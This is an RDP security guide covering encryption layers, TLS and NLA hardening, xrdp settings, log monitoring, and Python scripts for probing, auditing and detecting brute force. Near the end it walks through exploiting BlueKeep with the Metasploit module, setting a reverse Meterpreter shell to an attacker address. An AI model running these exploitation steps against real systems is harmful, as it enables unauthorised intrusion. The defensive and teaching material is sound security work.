Can RDP Be Encrypted? RDP Security Guide (updated)

Updated: March 15, 2026

To understand how RDP works, think of a remote-controlled toy car. The user presses buttons on the controller and the car moves forwards or backwards; the car is controlled without ever being touched, and the same is true of RDP. This article covers RDP security: the threats, the known vulnerabilities, and the encryption and hardening practices that matter.

A user can connect to a remote system, use all the tools and software installed on it, send mouse movements and keystrokes, and operate the system as if they were physically sitting in front of it, with local peripherals such as the mouse, keyboard, clipboard and printers redirected into the session.

When your organisation procures cyber security services to check the security controls in place, RDP is one of the most important elements to cover, whether in a build configuration review or in the methodology of a penetration testing engagement.

What is Remote Desktop Protocol (RDP)

Remote Desktop Protocol, or RDP, is a proprietary communication protocol developed by Microsoft that allows a user to connect to and control another computer.

In a nutshell, it allows users to remotely connect to a Windows machine on their local network or across the internet and gives them access to that machine through its graphical user interface (GUI). Whether the connection is actually secure depends on how the listener is configured, which is the subject of the rest of this article.

Microsoft says this about RDP:

The Microsoft Remote Desktop Protocol (RDP) provides remote display and input capabilities over network connections for Windows-based applications running on a server. RDP is designed to support different types of network topologies and multiple LAN protocols.

How does the Remote Desktop Protocol (RDP) work?

RDP works on a client-server model. The system originating the request (the local system) runs an RDP client, and the system being accessed (the remote desktop) runs the RDP server component, Remote Desktop Services.

The Remote Desktop Protocol (RDP) connection sequence above is taken from the official protocol specification on the Microsoft site.

The connection is made by supplying the host name or the IP address of the remote system in the built-in Microsoft Remote Desktop Connection application (mstsc.exe). Once connected, the local system sees the desktop of the requested machine.

Like any other network service, RDP listens on a dedicated port, 3389/TCP by default, for all of its traffic: mouse movements, keystrokes, the desktop display and the redirected devices. Since RDP 8.0 the client also uses 3389/UDP for the bulk of the display traffic when the server allows it, so firewall rules and exposure scans should cover both.

RDP encrypts the transferred data; on current Windows versions this is on by default and is done with TLS. Encryption adds a small amount of processing overhead on both ends, but it is not something to trade away for responsiveness.

RDP connections can also be established by using a Remote Desktop Gateway service.  


RDP Use Cases

Typical RDP use cases: network or system administrators troubleshooting a remote system; employees working from home who need to reach their office systems for their daily tasks; and individuals who need access to their own computer from elsewhere.

Some of the main features available in an RDP session include:

  • Smart card authentication
  • Bandwidth reduction (compression and caching)
  • Multiple displays are supported
  • Users can disconnect temporarily without logging off
  • Encryption of session data: 128-bit RC4 in the legacy RDP security layer, TLS on current versions
  • Audio redirection between the local and remote systems
  • File sharing through drive redirection
  • Local printers can be used in the session
  • Applications in the remote desktop session can access local serial and parallel ports
  • Shared clipboard
  • Applications on a remote desktop can be presented as if they ran on the local computer (RemoteApp)
  • Support for transport layer security (TLS) and Network Level Authentication
  • Support for faster connections (UDP transport)
  • Support for session shadowing

RDP’s Default Port And The Security Implications

By default, RDP listens on port 3389.

Exposing RDP to the internet means that 3389/TCP, or whatever port the service has been moved to, accepts connections from anyone. Bots and scripts scan the internet around the clock for such listeners, fingerprint them and feed them into brute-force and credential-stuffing campaigns. A single successful login gives a threat actor an interactive foothold on the internal network, which is why exposed RDP is one of the most common initial access vectors for ransomware. The convenience of an unprotected internet-facing RDP listener is not worth that risk.

Once a system is publicly accessible, attackers will try it. Even if RDP itself is fully patched, some other service or flaw on the host may be exploitable. If RDP is outdated and a pre-authentication vulnerability such as BlueKeep is present, credentials are not even needed, and a single host can become the entry point for compromising the company's entire network.

Is RDP Encrypted?

Yes, RDP encrypts session data by default.

How strong that protection is depends on two separate settings on the server: the security layer (which protocol protects the connection) and the encryption level (which key length the legacy layer uses), together with what the connecting client supports.

Two security layers exist. The legacy RDP security layer encrypts with RC4 keys negotiated by RDP itself and does not authenticate the server, so a client cannot tell a real server from an attacker in the middle. The TLS security layer (shown as "SSL" in the policy settings) wraps the connection in TLS, authenticates the server with a certificate and is what every supported Windows version uses by default with a modern client; Network Level Authentication (NLA) runs on top of it. The four encryption levels below apply only to the legacy RDP security layer; when TLS is in use the cipher suite comes from the Schannel configuration of the host. An administrator can lower the level for a legacy client that does not support the highest setting, but the better answer is to retire the client. The four RDP encryption levels are:

  1. FIPS-Compliant
  2. High
  3. Client Compatible
  4. Low

What level of encryption does RDP use?

There are four encryption levels available for the legacy RDP security layer (the policy setting "Set client connection encryption level"):

High

Data sent in both directions is encrypted with a 128-bit key. Clients that do not support 128-bit encryption cannot connect.

Client Compatible

Data sent in both directions is encrypted with the maximum key length supported by the client. This is the default, and it means a weak client gets a weak key.

Low

Data sent from the client to the server is encrypted with a 56-bit key; data sent from the server to the client is not encrypted at all.

FIPS-Compliant

This setting is for organisations that must follow the Federal Information Processing Standards (FIPS). All traffic in both directions is encrypted and integrity-checked using only FIPS 140-validated cryptographic modules (FIPS 140 is a validation standard for cryptographic modules, not an algorithm). It is the highest level the legacy layer offers and is also enforced when the host-wide policy "System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing" is enabled under Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options in Group Policy. Note that the host-wide policy affects every Schannel and CNG consumer on the machine, not just RDP, so test it before rolling it out.

How to check RDP Encryption Level?

Terminal Services Manager, which showed the encryption level of each session, was removed after Windows Server 2008 R2. On current hosts check the listener configuration instead: the WMI class Win32_TSGeneralSetting in the root\cimv2\TerminalServices namespace exposes SecurityLayer, MinEncryptionLevel and UserAuthenticationRequired for the RDP-Tcp listener, and the same values live in the registry under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp. From the network side, nmap's rdp-enum-encryption script reports which security layers and encryption levels a server will accept.

Even where the legacy layer is set to High, 128-bit RC4 with no server authentication is no longer acceptable. The fix is not a stronger RC4 key but forcing the TLS security layer: on current Windows the default security layer "Negotiate" already picks TLS for any modern client, but it still allows a fallback to the legacy layer for old clients, and that fallback is what downgrade attacks exploit.
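The negotiation that decides the security layer happens in the first packet pair of the connection sequence, before any encryption. The following Python script is an added example, not code from the original article or from Microsoft: it sends an X.224 Connection Request that offers only the legacy RDP security layer and reads the server's Connection Confirm. A server that answers with HYBRID_REQUIRED_BY_SERVER enforces NLA, one that answers SSL_REQUIRED_BY_SERVER enforces TLS but not NLA, and one that accepts the request (or sends no negotiation response at all) still allows the unauthenticated RC4 layer. The host name rdp.example.internal and the hex responses used for the offline checks are constructed for illustration.

```python
"""Probe which security layers an RDP server will accept (added example)."""
import socket
import struct
import sys

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR RDP_NEG_REQ / RDP_NEG_RSP)
PROTOCOL_RDP = 0x00000000        # legacy "Standard RDP Security": RC4, no server authentication
PROTOCOL_SSL = 0x00000001        # TLS
PROTOCOL_HYBRID = 0x00000002     # TLS + CredSSP, i.e. Network Level Authentication
PROTOCOL_HYBRID_EX = 0x00000008
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
PROTOCOL_NAMES = {PROTOCOL_RDP: "RDP (legacy)", PROTOCOL_SSL: "SSL/TLS",
                  PROTOCOL_HYBRID: "HYBRID (TLS + NLA)", PROTOCOL_HYBRID_EX: "HYBRID_EX"}
FAILURE_NAMES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}


def build_connection_request(requested_protocols: int) -> bytes:
    """TPKT header + X.224 Connection Request TPDU carrying a routing cookie and RDP_NEG_REQ."""
    cookie = b"Cookie: mstshash=probe\r\n"              # any user name will do here
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)
    body = cookie + neg_req
    # X.224 CR: LI (bytes after itself), code 0xE0, dst-ref, src-ref, class 0, then user data
    x224 = struct.pack("!BBHHB", 6 + len(body), 0xE0, 0, 0, 0) + body
    return struct.pack("!BBH", 3, 0, 4 + len(x224)) + x224   # TPKT: version 3, reserved, length


def parse_connection_confirm(data: bytes) -> dict:
    """Decode the X.224 Connection Confirm and the RDP_NEG_RSP / RDP_NEG_FAILURE inside it."""
    if len(data) < 11 or data[0] != 3 or data[5] != 0xD0:
        raise ValueError("not a TPKT-wrapped X.224 Connection Confirm")
    neg = data[11:19]                                    # 7-byte CC header ends at offset 11
    if len(neg) < 8:                                     # old servers send no rdpNegData at all
        return {"type": "none", "selected_protocol": PROTOCOL_RDP}
    ntype, flags, _length, value = struct.unpack("<BBHI", neg)
    if ntype == TYPE_RDP_NEG_RSP:
        return {"type": "response", "flags": flags, "selected_protocol": value,
                "protocol_name": PROTOCOL_NAMES.get(value, hex(value))}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"type": "failure", "failure_code": value,
                "failure_name": FAILURE_NAMES.get(value, hex(value))}
    raise ValueError(f"unexpected negotiation structure type {ntype:#x}")


def classify(result: dict) -> str:
    """Interpret the reply to a request that offered ONLY the legacy RDP security layer."""
    if result["type"] == "failure":
        if result["failure_code"] in (5, 6):
            return f"PASS: server requires authentication before a session ({result['failure_name']})"
        if result["failure_code"] == 1:
            return "WARN: server requires TLS but does not require NLA"
        return f"INFO: negotiation failed with {result['failure_name']}"
    if result["selected_protocol"] == PROTOCOL_RDP:
        return "FAIL: server accepts the legacy RDP security layer (RC4, no server authentication)"
    return f"INFO: server selected {result['protocol_name']}"


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection before answering")
        buf += chunk
    return buf


def probe(host: str, port: int = 3389, requested: int = PROTOCOL_RDP, timeout: float = 5.0) -> dict:
    """Send one Connection Request and return the parsed Connection Confirm."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(requested))
        head = _recv_exact(sock, 4)                      # TPKT header carries the total length
        data = head + _recv_exact(sock, struct.unpack("!H", head[2:4])[0] - 4)
    return parse_connection_confirm(data)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "rdp.example.internal"   # hypothetical host
    print(classify(probe(target)))
```

Run it as "python rdp_probe.py host" against a host you are authorised to test. The request is the same one every RDP client sends and the script disconnects before authentication, so it does not produce a failed-logon event (4625) on the server; a FAIL result means the listener is still at the "Negotiate" or "RDP" security layer and should be moved to SSL as described in the next section.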

How to enable RDP Encryption?

To force the TLS security layer on a Remote Desktop Session Host (the same policy applies to standalone workstations through the Local Group Policy Editor):

1. Open the Run dialog (Windows key + R), type "mmc.exe" and press Enter.

2. Open File > Add/Remove Snap-in, select "Group Policy Object Editor" and click "Add".

3. Select "Local Computer" and click "Finish" > "OK".

4. In the navigation pane go to: Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Security. Open "Require use of specific security layer for remote (RDP) connections".

5. Select the Enabled radio button and choose "SSL" from the drop-down (older policy templates label it "SSL (TLS 1.0)"). With this setting the server refuses clients that can only do the legacy RDP security layer instead of falling back to it. The "TLS 1.0" in the label is historical: the TLS version actually negotiated is whatever Schannel on the host allows, so disable TLS 1.0 and 1.1 there as well. In the same folder, enable "Require user authentication for remote connections by using Network Level Authentication" so that the client must authenticate through CredSSP before a session is created. Finally, replace the self-signed certificate the listener generates by default with one issued by a CA the clients trust; a self-signed certificate still encrypts, but it trains users to click through the identity warning that is their only defence against a man-in-the-middle.

Common RDP Vulnerabilities and Attack Vectors

The main RDP attack vectors and the weaknesses they rely on are:

  • BlueKeep (CVE-2019-0708) is a pre-authentication use-after-free in Remote Desktop Services on Windows 7, Server 2008 R2 and earlier. It allows remote code execution with no credentials and no user interaction, which makes it wormable; the related DejaBlue bugs of the same year (CVE-2019-1181 and CVE-2019-1182) affected newer versions as well.
  • Man-in-the-Middle (MitM) attacks intercept the connection between the RDP client and server. Against the legacy RDP security layer, which does not authenticate the server, this lets an attacker harvest credentials and keystrokes and inject input; against TLS it requires the user to accept an untrusted certificate.
  • Brute force and credential stuffing are the most common attacks in practice. Attackers use automated tools to guess usernames and passwords; credential stuffing replays credentials stolen in other breaches.
  • Session hijacking takes over an existing RDP session, for example a disconnected session on a host where the attacker already runs as SYSTEM, giving access to whatever that user is logged into.
  • Weak server authentication is the real form of the "clear-text credential" risk: credentials are never literally sent unencrypted, but without TLS and a trusted certificate the client has no way to know who it is encrypting them for, so they can be captured by whoever sits in the path.
  • Encryption downgrade attacks exploit a server left at the "Negotiate" security layer: an active attacker in the path can make the connection fall back to the legacy RDP layer, which is then open to the MitM attack above.

Recent Attacks

  • The Lazarus Group (a North Korean-linked threat actor) has been actively exploiting RDP vulnerabilities, including BlueKeep. They’re using these vulnerabilities to deploy ransomware and conduct espionage operations.

RDP & VPN: How does that work?

Since exposing internal servers to the public internet is a high risk, the safer route is a Virtual Private Network (VPN). The company then exposes only the VPN endpoint, which is built to be internet-facing, rather than each RDP host.

Users connect to the VPN, which creates an encrypted tunnel between their machine and the company's endpoint, and from then on their machine behaves as if it were on the internal network. They then RDP to the required system by its private IP address exactly as they would from inside the office. Note that the VPN moves the exposed surface rather than removing it: the VPN gateway itself needs MFA and patching, and the RDP hardening below still applies to the hosts behind it.

How to harden RDP security?

While using RDP, follow best-practice guidance and apply defence in depth; no single control below is sufficient on its own. The main practices are:

  1. Keep the operating system patched so that known RDP vulnerabilities are closed.
  2. Require multi-factor authentication for RDP access. Windows cannot enforce this on the RDP listener itself; it is done at the Remote Desktop Gateway, the VPN or through a third-party credential provider.
  3. Enforce strong password complexity and length rules.
  4. Enable an account lockout policy to slow down brute-force attacks, and monitor for lockouts, since an attacker can also use them to lock out legitimate users.
  5. Changing the RDP port from 3389 to a custom number reduces noise from the crudest scanners, but internet-wide scanners fingerprint the service on any port, so treat this as a convenience rather than a control.
  6. Do not accept RDP connections from arbitrary hosts; use the host firewall to allow only known source addresses (a jump host, the VPN pool, the gateway).
  7. Apply Zero Trust and the principle of least privilege: grant remote desktop rights only to those who need them, and remove Administrators from the Remote Desktop Users group where it is not required.
  8. Do not expose internal servers' RDP listeners to the public internet.
  9. Put a VPN or a Remote Desktop Gateway in front of internal servers; RD Gateway carries RDP over HTTPS (443) and can enforce MFA and per-user, per-resource authorisation policies.
  10. Scan your public address space at regular intervals for RDP listeners, on 3389 and on non-standard ports, and compare the results with what you believe is exposed.
  11. Enable Network Level Authentication (NLA), so that a client must authenticate before a session and its attack surface are created.
  12. Use single sign-on (SSO) where the environment supports it, so that RDP credentials are not a separate, weaker secret.
  13. Set the maximum encryption settings for the RDP listener in Group Policy, under Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Security:
    1. Set client connection encryption level -> Enabled, High Level (this governs the legacy layer only; it is a safety net in case the next setting is ever relaxed).
    2. Require use of specific security layer for remote (RDP) connections -> Enabled, security layer SSL (shown as "SSL (TLS 1.0)" in older templates).
    3. Require user authentication for remote connections by using Network Level Authentication -> Enabled.

Because the TLS security layer relies on Schannel, the TLS versions and cipher suites RDP offers are whatever the host allows: disable SSL 3.0, TLS 1.0 and TLS 1.1 in the Schannel protocol settings so that only TLS 1.2 and above are used, and restrict the cipher suite list. For the details, read Microsoft's guidance on managing Transport Layer Security (TLS).
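The three Group Policy settings above, together with the TLS procedure earlier, end up as DWORD values in the registry: SecurityLayer (0 = RDP, 1 = Negotiate, 2 = SSL/TLS), UserAuthentication (1 = NLA required) and MinEncryptionLevel (1 = Low, 2 = Client Compatible, 3 = High, 4 = FIPS). Policy values under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services override the listener's own values under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, which is why a host can look hardened in one place and not in the other. The following Python script is an added example, not code from the original article or from Microsoft: it reads both locations on a Windows host, merges them the way the server does, and reports which of the settings above are not met. The two sample configurations at the bottom are constructed for illustration.

```python
"""Audit the RDP listener's security layer, NLA and encryption level (added example)."""
import sys

# Registry locations under HKLM. Policy values, when present, override the
# listener's own values, which is what the server itself does.
WINSTATION_KEY = r"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"
AUDITED_VALUES = ("SecurityLayer", "UserAuthentication", "MinEncryptionLevel")

SECURITY_LAYER = {0: "RDP (legacy RC4, no server authentication)",
                  1: "Negotiate (TLS, with fallback to legacy RDP)",
                  2: "SSL/TLS only"}
ENCRYPTION_LEVEL = {1: "Low", 2: "Client Compatible", 3: "High", 4: "FIPS Compliant"}


def effective_settings(winstation: dict, policy: dict) -> dict:
    """Merge listener values with policy values; a policy value that is set wins."""
    merged = dict(winstation)
    merged.update({k: v for k, v in policy.items() if v is not None})
    return merged


def assess_rdp_listener(settings: dict) -> list:
    """Return one finding string per hardening setting that is not met (empty = hardened)."""
    findings = []
    layer = settings.get("SecurityLayer")
    if layer != 2:
        findings.append(f"SecurityLayer={layer} ({SECURITY_LAYER.get(layer, 'unset')}): "
                        "set to 2 so that TLS is required and the legacy layer is refused")
    if settings.get("UserAuthentication") != 1:
        findings.append("UserAuthentication!=1: Network Level Authentication is not required")
    level = settings.get("MinEncryptionLevel")
    if level is None or level < 3:
        findings.append(f"MinEncryptionLevel={level} ({ENCRYPTION_LEVEL.get(level, 'unset')}): "
                        "set to 3 (High) or 4 (FIPS) as a safety net for the legacy layer")
    return findings


def read_registry_values(key_path: str) -> dict:
    """Read the audited DWORDs from one HKLM key (Windows only); missing values are None."""
    import winreg  # only available on Windows, hence the local import
    values = {name: None for name in AUDITED_VALUES}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
            for name in AUDITED_VALUES:
                try:
                    values[name] = winreg.QueryValueEx(key, name)[0]
                except FileNotFoundError:
                    pass                      # value not set at this location
    except FileNotFoundError:
        pass                                  # policy key absent when no RDS policy applies
    return values


# Constructed samples: a listener left at Negotiate with NLA off, and the
# policy values that the three Group Policy settings above write.
WEAK_LISTENER = {"SecurityLayer": 1, "UserAuthentication": 0, "MinEncryptionLevel": 2}
HARDENED_POLICY = {"SecurityLayer": 2, "UserAuthentication": 1, "MinEncryptionLevel": 3}

if __name__ == "__main__":
    if sys.platform == "win32":
        settings = effective_settings(read_registry_values(WINSTATION_KEY),
                                      read_registry_values(POLICY_KEY))
    else:  # off Windows, audit the constructed sample instead of the live host
        settings = effective_settings(WEAK_LISTENER, {})
    for line in assess_rdp_listener(settings) or ["listener meets all three settings"]:
        print(line)
```

On a Windows host run it from an elevated prompt so that both keys are readable; every reported line maps back to one of the three policy settings, and an empty result means the listener refuses the legacy layer, requires NLA and keeps High as the floor for any future exception.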

RDP & Compliance Standards

Many compliance standards require protection of data in transit and during remote access sessions. The most relevant for RDP security are:

  • HIPAA (Health Insurance Portability and Accountability Act): Healthcare organisations must ensure the confidentiality, integrity, and availability of patient data. This includes strict controls on remote access, such as strong authentication, encryption, and access controls.
  • PCI DSS (Payment Card Industry Data Security Standard): Organisations handling cardholder data must comply with PCI DSS, which mandates strong access controls, including for remote access methods like RDP.
  • SOX (Sarbanes-Oxley Act): This act requires companies to maintain accurate financial records. Secure remote access, including proper logging and auditing of RDP sessions, is crucial for SOX compliance.
  • GDPR (General Data Protection Regulation): GDPR emphasizes the importance of data protection and privacy. Organizations must ensure that any processing of personal data, including remote access to systems containing such data, complies with GDPR requirements.

Alternatives to RDP

VPN

VPNs create an encrypted tunnel across the internet, letting you reach your office network remotely as if you were there. A VPN is not a substitute for RDP, since it provides the network path and not the desktop, but it is the usual way to avoid exposing RDP itself and can be combined with any remote desktop solution.

Chrome Remote Desktop

This Google service uses the Chrome browser to provide remote access to your computer. It is easy to set up and use, which makes it a convenient choice for personal and light business needs, but it is less capable than a full RDP deployment and leaves less under the organisation's control.

FreeRDP

This is an open-source implementation of the RDP protocol, used both as a client (xfreerdp) on Linux, macOS and other platforms and as a library by other projects. It is an alternative to Microsoft's client, not to RDP itself, so all the server-side hardening in this article still applies; setting it up and using it effectively requires some technical know-how.

TeamViewer

It is a popular commercial solution for remote access and support. It boasts a user-friendly interface, strong security measures, and a wide range of features, including file transfers, remote printing, and session recording. However, its free version has limitations, and the paid version can be quite expensive for some users.

XRDP

xrdp is an open-source RDP server commonly used to give Linux and other non-Microsoft systems an RDP listener that standard clients can connect to.

Is xrdp encrypted?

Yes, but how well depends on xrdp.ini. xrdp implements both the legacy RDP security layer and TLS, and its security_layer option selects between them: negotiate (the default, which accepts either), tls (TLS only) or rdp (legacy only). Set security_layer=tls and point certificate and key_file at a certificate the clients trust, otherwise xrdp generates a self-signed one. The crypt_level option (low, medium, high or fips) is the equivalent of the Windows encryption level and, as on Windows, matters only for the legacy layer.

The TLS protocol versions and cipher suites xrdp offers are also set in xrdp.ini, through ssl_protocols (restrict it to TLSv1.2 and TLSv1.3) and tls_ciphers; a 128-bit key by itself says nothing about the strength of the connection if TLS 1.0 or a weak cipher suite is still on offer.

TLS is designed to protect traffic over untrusted networks, so the risk is not that an attacker can decrypt a captured stream but that the client accepts an untrusted certificate and talks to an attacker instead of the server, and that the listener is reachable at all. A VPN in front of xrdp removes the second problem by keeping the listener off the internet; it does not replace certificate validation on the client.

xrdp is a reasonable remote desktop server when configured this way, but it is still a password-authenticated service and should be protected like any other.

Here are some additional security tips for using XRDP:

  • Use a strong password for the XRDP server.
  • Enable two-factor authentication for the XRDP server.
  • Keep the XRDP server up to date with the latest security patches.
  • Use a firewall to restrict access to the XRDP server.

How to monitor RDP security?

Monitoring RDP is crucial for finding attacks early; a brute-force campaign against an exposed listener is visible in the logs long before it succeeds. Key strategies:

  • Implement robust logging: on Windows, the Security log records logon failures (event 4625), successful logons (4624, where logon type 10 is RemoteInteractive, i.e. an RDP session) and session reconnects and disconnects (4778/4779); Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational event 1149 records the user and source address of each successful authentication. Note that when NLA is enabled, failed attempts appear as 4625 with logon type 3, not 10, because CredSSP authenticates before a session exists. Forward these logs off the host, since an attacker who gets in will clear them.
  • Utilise Security Information and Event Management (SIEM) systems: correlate RDP events with other sources to detect brute-force bursts, logons at unusual times or from unexpected locations, and a success that follows a run of failures from the same address.
  • Conduct regular security audits: review the listener configuration (security layer, NLA, encryption level), firewall rules, group memberships and policies to find drift.
  • Implement intrusion detection or prevention systems (IDS/IPS): these can flag exploitation attempts against RDP on the wire, including the malformed connection sequences used by exploits such as BlueKeep.
  • Utilise network traffic analysis tools: look for RDP on unexpected ports, internal hosts making outbound RDP connections (lateral movement) and long sessions from unusual sources.
  • Regularly review user access rights: ensure that users only hold the remote desktop permissions their role requires, adhering to the principle of least privilege.
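As an added example of the correlation a SIEM rule would do (not code from the original article or from any SIEM product), the Python below runs three checks over Windows Security events: a burst of 4625 failures from one source address inside a sliding window, a 4624 RemoteInteractive logon from a source that produced failures shortly before, and an RDP logon from an address outside an allow-list. The events are a constructed sample with only the fields the rules use; on a real host they would come from Get-WinEvent or the SIEM's forwarded records, and the allow-list 10.20.0.0/16 is an assumption.

```python
"""Correlate Windows Security events for RDP brute force and suspicious logons (added example)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network


def ev(event_id, when, ip, user, logon_type):
    """Build one event record with the Security-log fields the rules use."""
    return {"EventID": event_id, "TimeCreated": when, "IpAddress": ip,
            "TargetUserName": user, "LogonType": logon_type}


# Constructed sample, not real log data. With NLA, failures are logged as 4625
# with logon type 3; only a created session produces 4624 with logon type 10.
SAMPLE_EVENTS = [
    ev(4625, "2026-03-10T02:14:01", "203.0.113.7", "administrator", 3),
    ev(4625, "2026-03-10T02:14:30", "203.0.113.7", "admin", 3),
    ev(4625, "2026-03-10T02:15:02", "203.0.113.7", "backup", 3),
    ev(4625, "2026-03-10T02:15:40", "203.0.113.7", "backup", 3),
    ev(4625, "2026-03-10T02:16:10", "203.0.113.7", "backup", 3),
    ev(4625, "2026-03-10T02:16:45", "203.0.113.7", "backup", 3),
    ev(4624, "2026-03-10T02:17:20", "203.0.113.7", "backup", 10),   # the guessing pays off
    ev(4624, "2026-03-10T08:01:05", "10.20.0.15", "j.smith", 10),   # normal RDP logon
    ev(4624, "2026-03-10T08:03:05", "10.20.0.15", "j.smith", 2),    # console logon, ignored
    ev(4625, "2026-03-10T09:10:00", "10.20.0.31", "a.jones", 3),    # one typo, below threshold
]


def detect_rdp_abuse(events, allowed_sources=("10.20.0.0/16",),
                     threshold=5, window_minutes=5):
    """Return findings from the three correlation rules, in event order."""
    allowed = [ip_network(n) for n in allowed_sources]
    window = timedelta(minutes=window_minutes)
    failures = defaultdict(deque)        # source address -> timestamps of recent 4625s
    burst_reported = set()
    findings = []
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(e["TimeCreated"])
        src = e.get("IpAddress") or "-"
        if e["EventID"] == 4625:
            recent = failures[src]
            recent.append(ts)
            while recent and ts - recent[0] > window:    # drop failures outside the window
                recent.popleft()
            if len(recent) >= threshold and src not in burst_reported:
                burst_reported.add(src)                   # report each source once per run
                findings.append({"rule": "rdp_bruteforce", "source": src,
                                 "failures": len(recent)})
        elif e["EventID"] == 4624 and e.get("LogonType") == 10:
            preceding = [t for t in failures[src] if ts - t <= window]
            if preceding:
                findings.append({"rule": "success_after_failures", "source": src,
                                 "user": e["TargetUserName"], "failures": len(preceding)})
            if src == "-" or not any(ip_address(src) in net for net in allowed):
                findings.append({"rule": "rdp_logon_from_untrusted_source", "source": src,
                                 "user": e["TargetUserName"]})
    return findings


if __name__ == "__main__":
    for finding in detect_rdp_abuse(SAMPLE_EVENTS):
        print(finding)
```

The threshold and window are the parameters to tune against your own baseline; the "success after failures" rule is the one worth paging on, since a burst of failures alone is background noise on any internet-facing listener, while a success from the same address minutes later is the moment the attacker is inside.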

How attackers exploit the Remote Desktop Protocol?

As noted above, RDP has had several serious vulnerabilities, the best known of which is BlueKeep (CVE-2019-0708).

Public exploit code exists for BlueKeep, including a module in the Metasploit Framework, so an attacker needs little more than the target's IP address and an up-to-date Kali Linux system. The exploit is less reliable than that sounds, however: it depends on a kernel heap groom tuned to the exact Windows build and hypervisor, and choosing the wrong target usually crashes the host with a blue screen instead of returning a shell. For that reason the framework also ships a non-destructive check, auxiliary/scanner/rdp/cve_2019_0708_bluekeep, which reports whether a host is vulnerable without exploiting it.

For example, exploiting BlueKeep with the Metasploit Framework takes a handful of commands (the addresses below are the page's lab values):

Open the Metasploit console:
>> msfconsole
Select the BlueKeep exploit module:
>> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Set RHOSTS to the IP address of the target system:
>> set RHOSTS 192.168.31.75
Choose the target that matches the victim's OS build and hypervisor. List the available targets with "show targets" and then select the required one; target 3 is the one used in this lab:
>> show targets
>> set TARGET 3
Set LHOST to the IP address of your own machine (the default payload is a reverse Meterpreter, so the target must be able to reach it):
>> set LHOST 192.168.31.78
Type "exploit" to launch the module. If the groom succeeds, it returns a Meterpreter session on the target.


Can you use RDP over the internet?

It is possible to reach a machine over RDP from the public internet: if the server has a public IP address and the RDP port is allowed through the firewall, anyone on the internet can connect to it, and anyone with valid credentials can log in.

Doing so, however, introduces far more risk, because the listener is now exposed to every scanner, brute-force tool and exploit on the internet, and the credentials become the only thing standing between them and the internal network. If RDP has to be reachable from outside, put it behind a VPN or Remote Desktop Gateway with MFA rather than exposing the host directly.

Conclusion

In any organisation, remote desktop access to systems is efficient for day-to-day tasks, maintenance and troubleshooting, and RDP has become an essential tool, especially for system administrators. Implemented correctly, with the security layer, NLA, access restrictions and monitoring described above, it can be used safely.

If any of those controls is missed, however, RDP becomes a doorway for attackers to launch a full-scale attack on the network, ransomware being the most common outcome.

Most organisations therefore include infrastructure security assessments and periodic build reviews in their programme. These validate that the controls are actually in place and identify blind spots in day-to-day security practice.

FAQs

What is the default encryption for RDP?

On current Windows versions the security layer is negotiated to TLS with any modern client, Network Level Authentication is required by default, and the legacy encryption level defaults to Client Compatible. NLA is an authentication step (CredSSP) rather than the encryption itself; the encryption comes from TLS.

How secure is RDP over the internet?

RDP over the internet can be secure if properly configured with strong encryption (like TLS 1.2 or higher), multi-factor authentication (MFA), and robust security policies. However, it also carries inherent risks due to its exposure to the public internet.  

Can RDP be traced?

Yes, RDP connections can be traced. Logs on the server and client can record connection details such as IP addresses, timestamps, and user identities.  

Does RDP use TCP or UDP?

RDP uses TCP (3389) for the connection and the authentication handshake. Since RDP 8.0 the client also opens 3389/UDP for the display and input stream when the server permits it, with the UDP channel secured by TLS or DTLS depending on its mode; the TCP connection stays open throughout.

Does RDP use TLS?

Yes, RDP can and should use TLS (Transport Layer Security) for secure communication.  

Is RDP encrypted by default?

Yes. Current Windows versions negotiate TLS for every session by default and also require Network Level Authentication. NLA is authentication, not encryption, so the things to verify are that the security layer is set to SSL (TLS) rather than Negotiate, that only TLS 1.2 and above are enabled in Schannel, and that the listener presents a certificate the clients can validate.

Is RDP a VPN?

No, RDP is a remote desktop protocol, while a VPN (Virtual Private Network) creates a secure, encrypted tunnel for all network traffic.

How to secure your remote desktop server with GPO?

You can use Group Policy Objects (GPOs) to enforce the listener settings on every RDP server in scope, such as:

  • The TLS security layer, NLA and encryption level (Remote Desktop Session Host > Security)
  • Schannel protocol settings so that only TLS 1.2 or higher is enabled
  • Password complexity and account lockout requirements
  • Windows Defender Firewall rules that restrict the RDP port to allowed source addresses
  • Audit policy settings for logon and Remote Desktop Services events

MFA cannot be enforced by a GPO alone; it is applied at the Remote Desktop Gateway, the VPN or through a third-party credential provider deployed to the hosts.
